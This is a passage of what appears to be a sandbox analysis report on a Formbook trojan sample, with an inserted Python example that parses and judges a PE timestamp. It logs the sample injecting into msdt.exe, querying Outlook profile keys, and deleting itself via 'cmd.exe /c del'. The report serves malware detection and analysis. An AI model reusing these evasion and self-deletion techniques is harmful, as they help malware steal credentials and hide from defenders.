          Source: 1.2.Scn14.092020.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Scn14.092020.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/1@14/10
          Source: C:\Users\user\Desktop\Scn14.092020.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Scn14.092020.exe.log
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5676:120:WilError_01
          Source: Scn14.092020.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\explorer.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: Scn14.092020.exe | Virustotal: Detection: 20%
          Source: unknown | Process created: C:\Users\user\Desktop\Scn14.092020.exe 'C:\Users\user\Desktop\Scn14.092020.exe'
          Source: unknown | Process created: C:\Users\user\Desktop\Scn14.092020.exe C:\Users\user\Desktop\Scn14.092020.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Scn14.092020.exe'
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Process created: C:\Users\user\Desktop\Scn14.092020.exe C:\Users\user\Desktop\Scn14.092020.exe
          Source: C:\Windows\SysWOW64\msdt.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Scn14.092020.exe'
          Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32
          Source: C:\Users\user\Desktop\Scn14.092020.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\SysWOW64\msdt.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Scn14.092020.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Scn14.092020.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.396341112.0000000007640000.00000002.00000001.sdmp
          Source: Binary string: MusNotifyIcon.pdb source: explorer.exe, 00000002.00000000.401572746.000000000E1B0000.00000004.00000001.sdmp
          Source: Binary string: msdt.pdbGCTL source: Scn14.092020.exe, 00000001.00000002.419109090.00000000034D0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Scn14.092020.exe, 00000001.00000002.417638006.0000000001740000.00000040.00000001.sdmp, msdt.exe, 00000006.00000002.641809913.00000000045A0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Scn14.092020.exe, 00000001.00000002.417638006.0000000001740000.00000040.00000001.sdmp, msdt.exe
          Source: Binary string: MusNotifyIcon.pdbGCTL source: explorer.exe, 00000002.00000000.401572746.000000000E1B0000.00000004.00000001.sdmp
          Source: Binary string: msdt.pdb source: Scn14.092020.exe, 00000001.00000002.419109090.00000000034D0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.396341112.0000000007640000.00000002.00000001.sdmp

          Data Obfuscation:

          Binary contains a suspicious time stamp
          Source: initial sample | Static PE information: 0xD599EBD7 [Sat Jul 24 05:59:51 2083 UTC]
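          The stamp 0xD599EBD7 decodes to 24 July 2083, more than sixty years after the sample was submitted, which is why the report flags it. As an added example, not part of the Joe Sandbox report, the Python script below reads TimeDateStamp from the COFF file header of a PE image, renders it in the report's own date format, and classifies it against a first-seen date. The PE header it parses is constructed (a minimal MZ/PE header carrying only the report's stamp), and the first-seen date of 14 September 2020, read off the sample name, is an assumption.

```python
"""Read TimeDateStamp from a PE's COFF file header and judge its plausibility.

Added example, not part of the Joe Sandbox report. The header parsed here is
constructed (MZ stub, PE signature, COFF header carrying the report's stamp),
and FIRST_SEEN is an assumed first-seen date, not a value from the report.
"""
import struct
from datetime import datetime, timezone

REPORT_STAMP = 0xD599EBD7                                                  # the value the report flags
FIRST_SEEN = int(datetime(2020, 9, 14, tzinfo=timezone.utc).timestamp())  # assumed first-seen date
TEN_YEARS = 10 * 365 * 86400


def pe_timestamp(data: bytes) -> int:
    """Return the COFF TimeDateStamp of a PE image, validating the MZ and PE signatures."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    # IMAGE_FILE_HEADER follows the 4-byte signature: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    (stamp,) = struct.unpack_from("<I", data, e_lfanew + 8)
    return stamp


def stamp_to_utc(stamp: int) -> str:
    """Render the stamp the way the report prints it, e.g. 'Sat Jul 24 05:59:51 2083 UTC'."""
    return datetime.fromtimestamp(stamp, tz=timezone.utc).strftime("%a %b %d %H:%M:%S %Y UTC")


def classify_timestamp(stamp: int, seen_stamp: int) -> str:
    """'zero', 'future', 'ancient' or 'plausible' relative to the epoch time the file was first seen."""
    if stamp == 0:
        return "zero"                  # stripped, common in packers and some linkers
    age = seen_stamp - stamp
    if age < 0:
        return "future"                # compiled after it was observed: forged or not a clock value
    if age > TEN_YEARS:
        return "ancient"
    return "plausible"


def build_min_pe(stamp: int) -> bytes:
    """Constructed test input: MZ stub with e_lfanew = 0x40, PE signature, 20-byte COFF header."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    # Machine = i386, 1 section, the stamp, no symbols, 0xE0 optional header, EXECUTABLE_IMAGE | 32BIT_MACHINE
    coff = struct.pack("<HHIIIHH", 0x014C, 1, stamp, 0, 0, 0xE0, 0x0102)
    return bytes(dos) + b"PE\0\0" + coff


if __name__ == "__main__":
    stamp = pe_timestamp(build_min_pe(REPORT_STAMP))
    print(f"0x{stamp:08X} [{stamp_to_utc(stamp)}] -> {classify_timestamp(stamp, FIRST_SEEN)}")
```

          Read this signature together with the rest of the report before weighting it. The sample is a .NET assembly (IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, clr.dll in memory, the CLR_v4.0_32 usage log), and Roslyn's deterministic build mode writes a hash of the output into TimeDateStamp with the top bit set rather than a clock value, so managed binaries routinely carry stamps that decode to dates after 2038. A future stamp on its own is therefore a weak indicator for .NET files; here it only reinforces the invalid certificate and the injection into msdt.exe.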
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_004148E6 push es; retf 1_2_004148ED
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_00414977 push esi; ret 1_2_00414978
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_004149C5 pushfd ; iretd 1_2_004149C6
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_0041AAF5 push eax; ret 1_2_0041AB48
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_0041AB42 push eax; ret 1_2_0041AB48
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_0041AB4B push eax; ret 1_2_0041ABB2
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_0041ABAC push eax; ret 1_2_0041ABB2
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_00417C73 push cs; retf 1_2_00417C7E
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_00414E46 push 76AC60C6h; retf 1_2_00414E4B
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_0461D0D1 push ecx; ret 6_2_0461D0E4
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_02C8AAF5 push eax; ret 6_2_02C8AB48
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_02C8ABAC push eax; ret 6_2_02C8ABB2
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_02C8AB4B push eax; ret 6_2_02C8ABB2
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_02C8AB42 push eax; ret 6_2_02C8AB48
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_02C848E6 push es; retf 6_2_02C848ED
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_02C849C5 pushfd ; iretd 6_2_02C849C6
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_02C84977 push esi; ret 6_2_02C84978
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_02C84E46 push 76AC60C6h; retf